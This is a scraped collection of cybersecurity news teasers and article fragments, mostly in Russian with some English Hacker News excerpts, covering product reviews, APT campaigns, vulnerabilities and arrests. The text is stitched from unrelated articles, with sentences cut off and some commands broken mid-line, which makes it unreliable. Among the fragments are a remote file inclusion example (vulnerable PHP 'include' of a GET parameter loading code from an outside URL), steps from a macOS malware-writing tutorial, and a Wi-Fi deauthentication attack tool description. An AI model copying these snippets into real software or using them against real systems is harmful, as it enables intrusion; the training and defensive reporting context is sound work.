Инновационное устройство из Бристоля готово изменить мир квантовых компьютеров.

Inversion Space запустит технологию на борту миссии SpaceX Transporter-12 в октябре этого года.

Hugging Face предоставит бесплатную вычислительную мощь для разработчиков в сфере ИИ.

В Solar 4RAYS раскрыли детали атаки Obstinate Mogwai на телеком-компанию.

На простом хакатоне энтузиасты создали прорывную технологию, доступную каждому.

Корпорация нашла хитрый способ задушить конкурентов в обход законов.

Крупнейший производитель сельхозтехники переживает за безопасность клиентов и сотрудников.

Возникший как эволюция Waterbear, новый троян преследует более специфические цели…

Правительственные сети Южной Кореи попробовали на себе силу трояна.

Как КНДР финансирует себя за счет кражи криптовалюты.

Почему комбинация «1004» так популярна в Южной Корее? Секрет раскрыт.

Solar NGFW 1.2 — межсетевой экран нового поколения, обеспечивающий всестороннюю защиту корпоративной сети и контроль доступа к веб-ресурсам.

Одной из новых отечественных разработок такого рода является межсетевой экран нового поколения Solar NGFW, созданный на технологической базе Solar webProxy.

Solar NGFW в сетевой инфраструктуреСистемные требования Solar NGFWSolar NGFW распространяется как в формате программно-аппаратного комплекса, так и в виде виртуального решения (RUN-файла) для сред виртуализации.

Правила доступа без аутентификации в Solar NGFWГлавный рабочий столРабочий стол веб-консоли Solar NGFW содержит две вкладки: «Мониторинг» и «Статистика».

Создание правила в Solar NGFWТрансл…

О выпуске собственной модели — Solar NGFW — объявила и ГК «Солар».

Александр Баринов, директор портфеля продуктов сетевой безопасности ГК «Солар»Решение Solar NGFW может стать основным элементом единой экосистемы сетевой безопасности.

Solar NGFW встроен в концептуальную архитектуру Solar DozorОтметим, что в Solar Dozor реализована запатентованная технология анализа поведения пользователей (User Behavior Analytics, UBA).

Устройство Solar NGFW изнутриВыход нового продукта Solar NGFW интересен вдвойне.

Проводилось также тестирование эффективности IPS в интерфейсе Solar NGFW в режиме реального времени.

Опрос респондентов относительно используемых средств виртуализации в 2024 г.В настоящее время на российском рынке по отношению к средствам виртуализации формируется несколько запросов.

Опрос респондентов о стратегии в отношении виртуализации в компанииРанее мы выпускали обзоры vGate версий 4.7 и 4.5.

Проблематика защиты виртуализации в РоссииПри решении вопроса о защите средств виртуализации в России их владельцы сталкиваются с рядом трудностей.

Также важным элементом инфраструктуры является сервер мониторинга vGate, собирающий и коррелирующий информацию с агентов vGate и контролирующий состояние защищаемых систем.

Работа с правилами фильтрации в vGateПри создании правил фильтрации источник…

Основные виды угроз для почтового трафика в корпоративной сети включают в себя фишинговые атаки, вредоносные вложения и ссылки, спам и утечку данных.

Одним из вариантов повышения осведомлённости в сфере информационной безопасности для сотрудников может стать платформа Kaspersky ASAP.

Одной из ключевых функций ASAP является возможность проведения почтовых рассылок с целью обучения и информирования сотрудников о правилах безопасного поведения в сети.

Пример слайда из урокаСоздание учебной фишинговой кампанииЭтот компонент позволяет проверить практические навыки сотрудников в противостоянии фишинговым атакам.

Страница настроек антифишингового плагинаВыводыФункциональность почтовых рассылок в K…

Расскажем, что они представляют собой сегодня и как с ними бороться.

Атаки на уровне L7 нацелены на уязвимости веб-приложений и сервисов; такие методы, как HTTP-флуд и атаки на уязвимости в CMS, делают их особенно опасными для бизнеса.

Блокчейн и криптовалюты используются для анонимных платежей за DDoS-атаки, снижая риски для заказчиков и облегчая доступ к DDoS как услуге.

Здесь необходимы построение профилей нормального трафика и выявление отклонений от них в настоящем времени, учитывая частоту запросов, протоколы, типы контента и географию.

«Лаборатория Касперского» успешно отразила рекордную атаку на образовательные ресурсы, используя интеллектуальную фильтрацию трафика и выделенные инфр…

ВведениеКонтейнерная виртуализация, позволяющая упаковывать приложения и развёртывать их в изолированных и переносимых средах, стала революционной технологией в мире ИТ.

Роман Карпов поделился с коллегами своим опытом и отметил, что гибридный подход полезен для оптимизации стоимости и для обеспечения информационной безопасности.

Константин Аксёнов отметил, что несомненным достоинством российской системы будет достаточный опыт её производителя — как в разработке, так и в эксплуатации.

Константин Аксёнов предполагает, что в ближайшие годы организации будут активно внедрять инновационные процессы и использовать контейнеры для оптимизации своих операций.

В ближайшие два-три года ожидается рост …

ВведениеПрименение искусственного интеллекта в сфере информационной безопасности воплощается в наборе новаторских средств и технологий, содействующих автоматизации процессов выявления и анализа киберугроз, а также реагирования на них.

Общий результат применения искусственного интеллекта в сфере информационной безопасности заключается в повышении эффективности мероприятий по защите данных и в снижении рисков.

Учитывая эти критерии, организации могут осознанно выбрать ИИ-инструменты, способствующие повышению уровня информационной безопасности и снижению киберрисков (читайте наш материал — «Прогноз развития киберугроз и средств защиты информации — 2024»).

Она использует технологии искусственно…

Эксперты AM Live обсудили, как должна выглядеть идеальная автоматизация в ИБ.

Оценим преимущества и недостатки автоматизации в информационной безопасности, рассмотрим практические аспекты её внедрения.

Важность автоматизации в информационной безопасностиЧем вызвано повышенное внимание к автоматизации в информационной безопасности?

По мнению приглашённого эксперта Сергея Ширяева из АРСИБ, риски могут быть связаны с неправильным подбором средства автоматизации и неграмотным конфигурированием.

Эксперты прогнозируют дальнейшее развитие автоматизации в информационной безопасности, включая использование искусственного интеллекта и машинного обучения для повышения точности и эффективности.

Во-вторых, до сих пор нет однозначного мнения относительно принципиальной целесообразности и нужной степени внедрения ИИ в различных областях.

Необходимо также отметить многочисленные слухи, связанные с применением ИИ для военных целей и для обеспечения национальной безопасности.

В целом, стратегия развития ИИ в России оформилась к 2019 году.

«Холдинг Т1» и ИИГлобальные тренды свидетельствуют о том, что России сейчас важно получить новых вендоров, которые будут заниматься разработкой промышленных ИИ-решений и их масштабированием.

Мы хотим предложить рынку принципиально новый уровень технологических продуктов и сервисов в области больших данных и ИИ «под ключ».

Расскажем, чем привлекательны для киберпреступников PowerShell, Bash и JavaScript, в чём заключается секрет популярности C / C++ и как не стать жертвой вредоносных приложений на Python.

Отметим, что в эфире телепроекта AM Live недавно обсуждалось, как организовать процесс управления уязвимостями (Vulnerability Management) в 2024 году.

Какие языки программирования чаще всего используются для атакВажно принимать во внимание, что язык программирования — это всего лишь инструмент.

Python — один из наименее популярных языков среди создателей вредоносных программЕсть языки программирования, к которым в среде злоумышленников прибегают намного реже; к ним относится Python.

Использование СЗИ в совок…

Компании из всех отраслей ощущают на себе рост числа атак на свои веб-приложения.

Рассказываем о распределении атак на телеком-компании и интернет-площадки, зафиксированных среди пользователей платформы «Вебмониторэкс» в 2023 году, по типам, а также о способах защиты от них.

Анализ включал в себя оценку различных типов атак и рисков в целях определения общего уровня безопасности приложений.

Распространённые атаки на телекоммуникационные организацииАтака типа «RCE» направлена на использование уязвимостей для удалённого выполнения кода в веб-приложениях.

Проведение регулярных проверок паролей на слабость и на присутствие в базах утечек.

COPE (Company Owned, Personally Enabled) означает, что компания сама предоставляет сотруднику какое-то мобильное устройство, однако разрешает использовать его и для личных целей.

Разные подходы требуют различных политик для одних и тех же мобильных ОС и устройств.

В таких продуктах упор делался на использование гаджетов исключительно для корпоративных целей и на разграничение личных и рабочих данных пользователя.

Эти механизмы являются стандартными, поэтому если ваши разработчики или поставщики уже реализовали их для зарубежного UEM-вендора, чьим продуктом вы пользовались ранее, то для SafeMobile доработок не потребуется.

Подробная документация как для администратора и пользователя, так и д…

В феврале этого года на российском рынке ИБ появился новый сервис защиты веб-приложений МТС RED WAF.

Рассказываем о том, как этот сервис совместно с МТС RED Anti-DDoS защищает компании от комплекса атак на веб-ресурсы и в чём польза такого тандема.

В апреле на Anti-Malware.ru вышел актуальный обзор рынка защиты веб-приложений (WAF), где, помимо прочих, представлен сервис защиты веб-приложений МТС RED.

Как работает сервис защиты веб-приложений от взломаПосле того как компания принимает решение о подключении к сервису защиты веб-приложений, на DNS-серверах производится смена IP-адресов владельца защищаемых веб-ресурсов на IP-адреса сервис-провайдера защиты.

Это удобно, например, если компания…

Расскажем о проблемах реализации Purple Teaming как со стороны заказчика, так и со стороны исполнителя.

Проблемы защитниковВ первую очередь Purple Teaming нужен для команды защиты.

Лишь Purple Teaming позволит эффективно обнаружить слепые зоны, настоящие «чёрные дыры», закрома вашей сети.

Им требуется выполнять практически те же действия, что и на Red Teaming (либо — очень редко — что и при типовом пентесте).

В таком случае с экспертами, проводящими Purple Teaming, никто не взаимодействует, никто не просит помощи.

Процесс управления уязвимостямиЭтапы управления уязвимостямиЧто же такое управление уязвимостями (Vulnerability Management, VM) в России?

Модель управления уязвимостями не может быть достаточно полной без такого важного этапа, как полная подготовка инфраструктуры, отметила Анастасия Кузнецова.

Внедрение Vulnerability ManagementВедущий спросил спикеров о том, как оценить готовность организации ко внедрению полноценного процесса управления уязвимостями.

В течение трёх-пяти лет заказчики станут лучше понимать свои потребности в управлении уязвимостями и разбираться в доступных им решениях.

В течение трёх-пяти лет заказчики станут лучше понимать свои потребности в управлении уязвимостями и разб…

Логин и пароль от аккаунта — конфиденциальная информация, которую специалист не должен разглашать третьим лицам.

Самая главная причина в том, что в компании не выстроен режим коммерческой тайны.

Фрагмент из Положения о коммерческой тайнеФрагмент из перечня сведений, касающихся безопасности компанииЗатем такое Положение утверждается приказом руководителя.

Только в таком случае «Соглашение о коммерческой тайне» с SMM будет работать, и появится возможность реально защитить секретные данные — логин и пароль аккаунта в соцсети.

Дайте пароль, не огорчайте Леонида АркадьевичаКак считаете, реально доказать, что именно SMM-щик «слил» пароль кому-то постороннему?

● 2020-006 по обнаружению эксплуатации десериализации VIEWSTATE и уязвимости в ПО Telerik, а также по реагированию на подобные атаки.

● Май 2021 – как и в июне 2020 злоумышленники эксплуатировали десериализацию VIEWSTATE в проприетарном веб-приложении.

Если злоумышленник снова захочет выполнить powershell-команду, то будет отправлен тот же POST-запрос, содержащий VIEWSTATE с Ps-сборкой, но с другим параметром cadata.

Мастер-ключ хранится в реестре и в дальнейшем используется при генерации ключей, которые уже непосредственно участвуют в валидации и расшифровке.

Надеемся, что в нашей статье вы нашли много полезной информации об уязвимости десериализации VIEWSTATE и способах детектирования под…

Что такое обфускацияОбфускация JavaScript — процесс, который делает исходный код на JavaScript менее понятным для людей, сохраняя его функциональность для компьютера или браузера.

Программный код, написанный на интерпретируемых языках, таких как Python, PHP и JavaScript, может быть опубликован без компиляции.

Вот почему обфускация часто применяется с JavaScript.

Обфускация JavaScript — важный шаг для защиты веб-приложений и скриптов от несанкционированного доступа и взлома.

Packing JavaScriptМетод включает переименование переменных и функций, изменение порядка выполнения операций, добавление ложных конструкций и в целом запутывание.

Линии SOC: в чем разницаНачнем с того, что линейность в SOC очень условна.

В большинстве случаев это входная точка в SOC: сюда берут и молодых специалистов, и студентов, и стажеров без опыта, но с хорошей теоретической базой.

Если стажер успешно проходит обучение и в нем видят перспективного специалиста, то он может получить предложение о переходе в штат.

Например, Тинькофф и Positive Technologies на базе Центрального университета запустили образовательную программу для действующих и будущих сотрудников SOC и готовят совместную магистратуру по кибербезопасности.

И эту модель, когда все открыты, инициативны, замотивированы как в личном росте, так и в развитии команды в целом, я стараюсь восп…

В ней мы рассказали о том, как ввели собственную методологию обучения веб-безопасности для новых сотрудников, но не останавливались детально на каждой веб-уязвимости.

Уязвимости мы разбили на две группы: Server Side — для бэкендеров и Client Side — для фронтендеров.

Пример:Код в проекте:$file = $_GET['template']; include($file);Вызов скрипта:/view.php?template=http://some.site/remote_code.phpВажно отметить, что php на стороне злоумышленника не должен выполняться и не должен быть установлен, то есть код файла должен отдаваться в чистом виде.

Так, хакер может внедрить код в поле ввода или в URL-адрес и заставить сервер выполнить его как часть шаблона.

Выполняемые скрипты могут содержаться в о…

Эта уязвимость приводит к удаленному выполнению кода в серверной версии pgAdmin4 ≤ 8.4 на системах Windows.

В pgAdmin4 есть интересная возможность указать путь к утилитам для работы с postgres, например psql, pg_dump, pg_dumpall, pg_restore .

Именно здесь кроется уязвимость, которую мы можем проэксплуатировать, загрузив в хранилище наш исполняемый файл с любым названием из массива UTILITIES_ARRAY .

ЗаключениеСегодня мы с вами рассмотрели уязвимость удаленного выполнения кода в pgAdmin4.

Если вы используете pgAdmin4 в серверном моде, рекомендуется обновиться до последней версии, чтобы избежать возможной эксплуатации со стороны злоумышленников.

Причем для первого пункта будет тратиться до 80% времени, так как качество обученной модели в первую очередь зависит от количества, вариативности и качества данных для обучения.

Всё это динамично развивается и требует регулярных корректировок в работе модели и механизмов NER в целом.

Мы постоянно проводим эксперименты с обучением модели на накопленных новых отчетах из текущих источников и на основании внутреннего фидбека.

На тестовом наборе проверили модель, обученную на сбалансированном датасете, и модель, обученную на несбалансированных данных.

В нашей ситуации переизбыток класса Malware_name на деле оказался незначительным для модели, а его сокращение привело к потере контекста для други…

ВведениеСемейство микроконтроллеров ESP имеет кучу применений как в повседневной жизни, так и в узких отраслях.

WARNINGВажно отметить, что прошивка платы ESP32 для тестирования Wi-Fi на уязвимости должна использоваться исключительно в рамках законных и этичных целей.

ESP32 Wi-Fi Penetration ToolПроект представляет собой универсальный инструмент на платформе ESP32 для реализации атак на Wi-Fi.

EAPOL обеспечивает защиту от несанкционированного доступа и поддерживает различные методы аутентификации, такие как EAP-TLS, EAP-TTLS, PEAP и другие.

ПрактикаВыбираем нашу сеть, тип атаки, и в качестве метода берём активный захват(деаутентификация пользователей).

Мы в “Стингрей Технолоджиз” ежегодно выпускаем отчет об оценке уровня защищенности российских мобильных приложений по отраслям.

На мой взгляд, эру современных мобильных приложений начал Apple, после запуска iPhone 4 в 2010 году, вышедшем уже с операционной системой iOS.

За ней подтянулся и Google, и с тех пор рынок мобильных приложений занял большую часть цифрового пространства, а вскоре обогнал другие каналы по количеству активных пользователей.

Давайте подробнее рассмотрим несколько особенностей приложений и подумаем, как они влияют на безопасность.

И кто знает, что именно происходит на многочисленных noname-устройствах и что конкретно производители поменяли внутри?

Но роудмап говорит: «Изучи этот модуль, потому что он понадобится для понимания следующей темы, а в совокупности это пригодится в работе в SOC».

Дорожную карту мы переносим на расписание обучающего трека, на учебный план, программу обучения и непосредственно на сами обучающие материалы.

Фундаментальная частьСледующий уровень состоит из подробно расписанной фундаментальной части, как в учебнике.

Требуется оценить потенциальную аудиторию курса и убедиться в наличии спроса на материал, чтобы не работать в стол.

Например – оставлять оставлять в задании несколько флагов (как в CTF, Capture-the-Flag), а потом попросить их указать в тесте.

На проектах в различных компаниях мы много сталкиваемся с практическими вопросами о том, как выстроить мониторинг ИБ в АСУ ТП.

Злоумышленник, получив доступ к сети и перемещаясь по ней, может оказаться в технологической сети и сделать там что-нибудь нехорошее.

Неавторизованные чтения и записи тегов в ПЛКПочему это важноТегами, или технологическими сигналами, обычно называют переменные в памяти ПЛК, в которых содержится либо текущее значение измеряемого физического показателя, либо режим работы того или иного подпроцесса в ПЛК.

Конечно, сам факт изменения файла проекта либо передачи его по сети не говорит о наличии в сети злоумышленника.

Как правило, у каждого вендора АСУ ТП имеются штатные …

Что такое WAF и как с ним работать.

Показываем на примере уязвимого веб-приложения

Это часто используется для перехвата вызовов функций, манипуляций с поведением программ и даже для добавления вредоносной функциональности в безвредное приложение.

Память может быть помечена как читаемая (R), записываемая (W), исполняемая (E) и как сочетания этих трёх вариантов.

Сообщение «Hello World!» выводится, и это подтверждает, что шелл-код исполняется ожидаемым образом и создаёт нужный вывод.

Хотя LaunchAgent в основном работают в рамках пользовательских сессий, их можно найти и в системных папках наподобие /System/Library/LaunchAgents .

Для написания вредоносного ПО требуется время и энергия, так что они нацеливаются на тот минимум, которого можно достичь без труда.

В этой статье мы погрузимся в мир проектирования и разработки вредоносного ПО для macOS, которая по сути является операционной системой на основе Unix.

По какому плану мы с вами будем двигаться:Начнем со знакомства с архитектурой macOS и с особенностями её безопасности;Затем углубимся во внутреннее устройство и рассмотрим ключевые элементы: Mach API и ядро;Создадим заготовку зловредного ПО.

В этом разделе мы в основном рассмотрим меры для защиты безопасности и, в частности, System Integrity Protection (SIP).

Для начала напишем код, который записывает свою копию или в /usr/bin/, или в /Library/.

Тем не менее развёртывание макета позволяет нападающим получить существенный объём информации, ко…

Например, ChatGPT может использоваться для оказания помощи людям в тестировании на проникновение и для создания вредоносных программ.

Было отобрано 15 уязвимостей, охватывающих уязвимости в веб-приложениях, уязвимости в программном обеспечении для управления контейнерами и уязвимости в пакетах Python.

ВыводыИсследование продемонстрировало, что LLM-агенты уже могут автономно взламывать сайты и использовать некоторые реальные уязвимости в компьютерных системах (а с наличием описания их эксплуатации — большинство из них).

Однако возможно, что в будущем появятся расширения, которые смогут эксплуатировать и такие уязвимости, а свободно доступные LLM-модели повторят успех проприетарного собрата.

…

Проблема позволяет обманом вынудить жертву подключиться к менее защищенной беспроводной сети и прослушивать сетевой трафик пользователя.

Он затрагивает все операционные системы и Wi-Fi клиенты, включая домашние и mesh-сети, основанные на протоколах WEP, WPA3, 802.11X/EAP и AMPE.

В результате злоумышленник может обманом заставить пользователя подключиться к недоверенной сети Wi-Fi, а не к той, к которой он собирался подключиться изначально, осуществив атаку типа «противник посередине» (adversary-in-the-middle, AitM).

«В нашей атаке, когда жертва хочет подключиться к сети TrustedNet, мы обманом вынуждаем ее подключиться к другой сети — WrongNet, которая использует аналогичные учетные данные, …

На прошедшей конференции Google I/O 2024 разработчики объявили о нескольких новых защитных функциях, которые появятся в Android 15 и Google Play Protect, и помогут бороться с мошенничеством, скамом и вредоносными приложениями на устройствах пользователей.

Также стало известно, что новая функциональность появится и в Google Play Protect.

Риск известных вредоносных программ : прежде чем выполнять важные действия или работать с конфиденциальными данными, разработчики смогут проверить, активен ли Google Play Protect и нет ли на устройстве пользователя известных вредоносных программ.

: прежде чем выполнять важные действия или работать с конфиденциальными данными, разработчики смогут проверить, а…

Специалисты говорят, что в первом квартале 2024 года почти в два раза выросло число смешанных мультивекторных атак, достигнув доли 23,22%, что в первую очередь связывают с увеличением доступных злоумышленникам мощностей.

Как уже было сказано выше, наибольшее количество атак в первом квартале пришлось на сегмент электронной коммерции (25,26% всех атак).

Если наиболее продолжительная атака произошла в сегменте интернет-магазинов и длилась почти три недели, то вторая по продолжительности атака была зафиксирована в сегменте онлайн ставок и длилась 72 часа.

В этот день было зафиксировано 22 258 587 запросов (но это почти на 27% меньше пиковой атаки четвертого квартала 2023 года в сегменте онлайн…

В этом году второй международный киберфестиваль Positive Hack Days будет проходить с 23 по 26 мая на территории спорткомплекса «Лужники» в Москве.

На площадке научно-популярного хак-феста у всех участников будет возможность погрузиться в мир цифровых технологий и познакомиться с их создателями.

Гости фестиваля смогут напрямую прикоснуться к достижениям российской науки в сфере информационных технологий и кибербезопасности.

«В этом году Positive Hack Days впервые пройдет на площадке спорткомплекса “Лужники” и второй раз — в формате большого городского киберфестиваля, — рассказывает Виктория Алексеева, программный директор PHDays Fest 2.

Участие в молодежном дне киберфестиваля бесплатное.

Братья Антон Перейро-Буэно (Anton Peraire-Bueno) и Джеймс Перейро-Буэно (James Pepaire-Bueno) были арестованы в начале текущей недели в Бостоне и Нью-Йорке.

И, по мнению властей, хакерская схема братьев была настолько сложной, что «ставит под сомнение саму целостность блокчейна».

И как только они привели свой план в действие, ограбление заняло всего 12 секунд», — рассказывает прокурор США Дэмиан Уильямс (Damian Williams).

По сути, схема эксплуатировала блокчейн Ethereum в моменты после проведения транзакций, но до их добавления в блокчейн.

В случае вынесения обвинительного приговора каждому из них грозит максимальное наказание в виде 20 лет лишения свободы по каждому пункту обвинения.

В этом году «Хакер» праз­дну­ет 25-летие, и сегод­ня в качес­тве экспе­римен­та мы запус­каем неболь­шое раз­вле­чение.

Это хакер­ский квест, который по задум­ке дол­жен занять тебя на выход­ных.

Это наш пер­вый опыт в орга­низа­ции таких квес­тов, поэто­му слож­ность и тре­буемое на решение вре­мя мы можем оце­нить толь­ко при­мер­но.

Сра­зу пре­дуп­режда­ем, что в пла­не нас­тупатель­ной безопас­ности квест пред­полага­ет толь­ко раз­ведку.

Если у тебя вдруг получит­ся что‑то взло­мать, то про­сим ничего не тро­гать и зарепор­тить свое дос­тижение, написав в Telegram ответс­твен­ному (@electric_panda).

Компания Google анонсировала ряд новых функций для Android, которые призваны защитить устройства от кражи и потери данных.

Некоторые из них будут доступны только для устройств на базе Android 15 и выше, но другие планируется распространить на миллиарды устройств под управлением Android 10 и более старых версий.

Также Google анонсировала функцию Remote Lock, которая поможет людям, чьи устройства на базе Android уже были украдены.

Ожидается, что функции Theft Detection Lock, Offline Device Lock и Remote Lock будут доступны на устройствах под управлением Android 10 или выше через обновление сервисов Google Play, которое появится позже в текущем году.

«Благодаря этому обновлению, если вор прину…

Компания Recorded Future предупредила о вредоносной кампании, в рамках которой злоумышленники использовали легитимный профиль на GitHub для распространения инфостилеров.

По словам исследователей, хакеры, находящиеся на территории СНГ, распространяли через GitHub такую малварь, как Atomic macOS Stealer (AMOS), Vidar, Lumma и Octo, маскируя их под легитимные приложения, включая 1Password, Bartender 5 и Pixelmator Pro.

Взяв эти отчеты за отправную точку, Recorded Future удалось обнаружить 12 сайтов, рекламирующих ПО для macOS, но в итоге перенаправляющих пользователей на профиль GitHub, распространяющий AMOS.

Аккаунт на GitHub принадлежит пользователю под ником papinyurii33, был создан 16 янва…

Ботнет Ebury, существующий с 2009 года, заразил почти 400 000 Linux-серверов, и примерно 100 000 из них все еще скомпрометированы, сообщают аналитики ESET.

ESET наблюдает за Ebury уже более десяти лет, и на этой неделе исследователи сообщили, что недавние действия правоохранительных органов позволили им получить представление о деятельности малвари за последние пятнадцать лет.

«Хотя 400 000 — это огромное число, важно отметить, что это общее количество компрометаций почти за 15 лет.

Однако каждый раз, когда нам удавалось измерить количество серверов, скомпрометированных с помощью Ebury, будь то 10 лет назад или в последние несколько лет, мы получали около 40 000 IP-адресов.

Исследователи пи…

Desktop Window Manager — это служба Windows, появившаяся еще в Windows Vista и позволяющая ОС использовать аппаратное ускорение при рендеринге графических элементов пользовательского интерфейса.

Название файла намекало, что в нем могут содержаться сведения об уязвимости в Windows.

Эта находившаяся под атаками проблема, связана с обходом защиты OLE, добавленной в Microsoft 365 и Microsoft Office для защиты пользователей от уязвимых элементов управления COM/OLE.

Также в Microsoft утверждают, что упомянутая выше уязвимость CVE-2024-30051 тоже была раскрыта публично, хотя неясно, где именно.

Кроме того, Microsoft сообщает, что уязвимость отказа в обслуживании в Microsoft Visual Studio (CVE-2024…

Алексей Перцев, один из разработчиков криптовалютного миксера Tornado Cash, был приговорен к 64 месяцам тюремного заключения в Нидерландах за участие в отмывании криптовалюты на сумму более 2 миллиардов долларов.

Также граждане США и другие лица в Соединенных Штатах лишились возможности вести дела с Tornado Cash без специального разрешения от OFAC.

На суде сам Перцев утверждал, что хотел лишь обеспечить приватность для криптовалютного сообщества и не нарушал закон, поддерживая преступные операции.

В результате, по данным голландских правоохранителей, через Tornado Cash было отмыто от 1,2 до 2,2 млрд долларов, полученных в результате как минимум 36 различных кибератак.

Tornado Cash фактическ…

Компания Google выпустила еще одно экстренное обновление для своего браузера Chrome, чтобы устранить третью за неделю уязвимость нулевого дня, уже используемую хакерами в атаках.

Свежий 0-day получил идентификатор CVE-2024-4947, и разработчики предупреждают, что для этой проблемы уже существует эксплоит, и она уже применяет в реальных атаках.

Компания исправила ошибку с выходом версий 125.0.6422.60/.61 для Mac и Windows, а также в версии 125.0.6422.60 для Linux.

Напомним, что это уже третья уязвимость нулевого дня в Chrome, исправленная за последнюю неделю: ранее инженеры Google выпустили срочные патчи для проблем CVE-2024-4671 и CVE-2024-4761.

Таким образом, в 2024 году в Chrome уже исправ…

Если же ты решишь соз­дать x64-образ, то уста­нов­ка мно­гих пакетов будет про­ще и не пот­ребу­ет час­ти зависи­мос­тей.

Ес­ли мы исполь­зуем coerce в сочета­нии с Kerberos, то обя­затель­но берем с собой сле­дующий инс­тру­мент:git clone https:/ / github.

com/ dirkjanm/ krbrelayxНе­лиш­ним будет исполь­зовать нашумев­шие тех­ники повыше­ния при­виле­гий через ADCS:pip3 install certipy- ad git clone https:/ / github.

Сре­ди них — уяз­вимость под­систе­мы печати Windows:git clone https:/ / github.

2_ linux_ 386. zip nuclei -d / usr/ local/ bin/ git clone https:/ / github.

В настоящее время на сайте отображается сообщение о том, что ресурс и все данные на бэкэнде были захвачены ФБР.

Теперь ФБР призывает пострадавших и других людей сообщить им любую информацию о хак-форумах BreachForums и Raidforums и их участниках, чтобы помочь в расследовании.

«С июня 2023 года по май 2024 года BreachForums (расположенный по адресам breachforums[.

— Ранее, с марта 2022 года по март 2023 года, отдельная версия BreachForums (размещенная по адресам breached[.

Тогда прокуроры заявляли, что при Фицпатрике на BreachForums «слили» доступ к личной информации миллионов граждан США.

Вредонос предназначался для атак на устройства под управлением macOS ради последующего получения доступа к корпоративным сетям, и использовал в своих атаках фреймворк Sliver.

Новая атака, замеченная специалистами Phylum, начинается с вредоносного Python-пакета для macOS, который носит название requests-darwin-lite.

Пакет, размещенный в PyPI (в настоящее время уже удален), содержал бинарник Sliver в файле PNG с логотипом Requests размером 17 МБ.

UUID использовался для проверки того, что пакет устанавливается на настоящую машину, для чего производилось сравнение с заранее заданными UUID.

Судя по всему, именно поэтому злоумышленники в итоге вернули пакет в нормальное состояние, не желая привле…

The cryptojacking group known as Kinsing has demonstrated its ability to continuously evolve and adapt, proving to be a persistent threat by swiftly integrating newly disclosed vulnerabilities to exploit arsenal and expand its botnet.

Kinsing (aka H2Miner), a name given to both the malware and the adversary behind it, has consistently expanded its toolkit with new exploits to enroll infected systems in a crypto-mining botnet.

Subsequent analysis by CyberArk in 2021 unearthed commonalities between Kinsing and another malware called NSPPS, concluding that both the strains "represent the same family."

Kinsing's attack infrastructure falls into three primary categories: Initial servers used for…

The XM Cyber Attack Graph Analysis(™) identifies the key intersections where multiple attack paths toward critical assets converge as "choke points".

They are especially dangerous because compromising just one can expose a significant portion of critical assets.

Finding and Categorizing Exposures: Focus on Critical AssetsWhere are exposures and how do attackers exploit them?

Active Directory remains the cornerstone of organizational identity management – yet the report found that 80% of all security exposures identified stem from Active Directory misconfigurations or weaknesses.

Transportation and Energy have a much higher percentage of critical exposures, despite having fewer overall vulne…

"Comparing the two malware variants, Deuterbear uses a shellcode format, possesses anti-memory scanning, and shares a traffic key with its downloader unlike Waterbear."

Put differently, the first Waterbear RAT serves as a downloader while the second Waterbear RAT functions as a backdoor, harvesting sensitive information from the compromised host through a set of 60 commands.

This loader is ultimately responsible for executing a downloader, which again downloads the Deuterbear RAT from a C&C server for information theft.

Deuterbear RAT is also a more streamlined version of its predecessor, retaining only a subset of the commands in favor of a plugin-based approach to incorporate more functio…

The Kimsuky (aka Springtail) advanced persistent threat (APT) group, which is linked to North Korea's Reconnaissance General Bureau (RGB), has been observed deploying a Linux version of its GoBear backdoor as part of a campaign targeting South Korean organizations.

GoBear was first documented by South Korean security firm S2W in early February 2024 in connection with a campaign that delivered malware called Troll Stealer (aka TrollAgent), which overlaps with known Kimsuky malware families like AppleSeed and AlphaSeed.

A subsequent analysis by the AhnLab Security Intelligence Center (ASEC) revealed that the malware is distributed via trojanized security programs downloaded from an unspecifie…

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added two security flaws impacting D-Link routers to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation.

"By combining an authentication bypass with command execution the device can be completely compromised," it said, adding the issues impact routers running firmware version DIRX4860A1_FWV1.04B03.

D-Link has since acknowledged the issue in a bulletin of its own, stating a fix is "Pending Release / Under Development."

It described the issue as a case of LAN-side unauthenticated command execution flaw.

While there is no evidence that these flaws have been exploited, users are…

Researchers have discovered a new security vulnerability stemming from a design flaw in the IEEE 802.11 Wi-Fi standard that tricks victims into connecting to a less secure wireless network and eavesdrop on their network traffic.

The method "involves downgrading victims to a less secure network by spoofing a trusted network name (SSID) so they can intercept their traffic or carry out further attacks," TopVPN said, which collaborated with KU Leuven professor and researcher Mathy Vanhoef.

"A successful SSID Confusion attack also causes any VPN with the functionality to auto-disable on trusted networks to turn itself off, leaving the victim's traffic exposed."

"As a result, the victim's client …

The North Korea-linked Kimsuky hacking group has been attributed to a new social engineering attack that employs fictitious Facebook accounts to targets via Messenger and ultimately delivers malware.

"The threat actor created a Facebook account with a fake identity disguised as a public official working in the North Korean human rights field," South Korean cybersecurity company Genians said in a report published last week.

The multi-stage attack campaign, which impersonates a legitimate individual, is designed to target activists in the North Korean human rights and anti-North Korea sectors, it noted.

This raises the possibility that the campaign may be oriented toward targeting specific pe…

Security researchers have disclosed almost a dozen security flaws impacting the GE HealthCare Vivid Ultrasound product family that could be exploited by malicious actors to tamper with patient data and even install ransomware under certain circumstances.

The exploit chain devised by Nozomi Networks combines CVE-2020-6977 to get local access to the device and then weaponizes CVE-2024-1628 to attain code execution.

GE HealthCare, in a set of advisories, said "existing mitigations and controls" reduce the risks posed by these flaws to acceptable levels.

The disclosure comes weeks after security flaws were also uncovered in the Merge DICOM Toolkit for Windows (CVE-2024-23912, CVE-2024-23913, an…

"Storm-1811 is a financially motivated cybercriminal group known to deploy Black Basta ransomware," the company said in a report published on May 15, 2024.

The attack chain involves the use of impersonation through voice phishing to trick unsuspecting victims into installing remote monitoring and management (RMM) tools, followed by the delivery of QakBot, Cobalt Strike, and ultimately Black Basta ransomware.

Storm-1811 then uses PsExec to deploy Black Basta ransomware throughout the network."

It is "distributed by a small number of threat actors who typically rely on other threat actors for initial access, malicious infrastructure, and malware development," the company said.

Organizations a…

Google has rolled out fixes to address a set of nine security issues in its Chrome browser, including a new zero-day that has been exploited in the wild.

Assigned the CVE identifier CVE-2024-4947, the vulnerability relates to a type confusion bug in the V8 JavaScript and WebAssembly engine.

Type confusion vulnerabilities arise when a program attempts to access a resource with an incompatible type.

It can have serious impacts as it allows threat actors to perform out-of-bounds memory access, cause a crash, and execute arbitrary code.

The development marks the third zero-day that Google has patched within a week after CVE-2024-4671 and CVE-2024-4761.

The website ("breachforums[.

It's worth noting a prior iteration of BreachForums, hosted at breached.vc/.to/.co and managed by pompompurin, was seized by law enforcement in late June 2023.

